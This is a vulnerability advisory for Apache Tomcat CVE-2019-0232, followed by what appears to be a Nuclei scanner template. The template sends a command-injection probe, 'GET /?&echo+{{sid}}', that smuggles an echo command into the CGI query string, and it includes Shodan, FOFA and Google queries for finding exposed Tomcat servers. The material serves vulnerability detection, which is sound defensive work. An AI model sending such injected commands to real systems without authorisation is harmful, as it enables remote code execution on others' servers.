When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
PoC代码[已公开]
id: CVE-2019-0232
info:
name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
author: DhiyaneshDk
severity: high
description: |
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
reference:
- http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2019/May/4
- https://access.redhat.com/errata/RHSA-2019:1712
- https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
- https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2019-0232
cwe-id: CWE-78
epss-score: 0.94164
epss-percentile: 0.99911
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
vendor: apache
product: tomcat
shodan-query:
- http.html:"apache tomcat"
- http.title:"apache tomcat"
- http.html:"jk status manager"
- cpe:"cpe:2.3:a:apache:tomcat"
fofa-query:
- body="jk status manager"
- body="apache tomcat"
- title="apache tomcat"
google-query: intitle:"apache tomcat"
tags: cve,cve2019,packetstorm,seclists,apache,tomcat
variables:
sid: "{{rand_text_alpha(10)}}"
http:
- raw:
- |
GET /?&echo+{{sid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{sid}}"
- type: word
negative: true
part: body
words:
- "echo {{sid}}"
- "echo+{{sid}}"
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a00473045022100826e317f73e79c34ab4bbde6246ddc0d92cab81741ffb4cc92297347b7835ec5022042cf828780e44ea80924500b7f45876ae2cf8b133f4c26119e8f2d37bf765eee:922c64590222798bb761d5b6d8e72950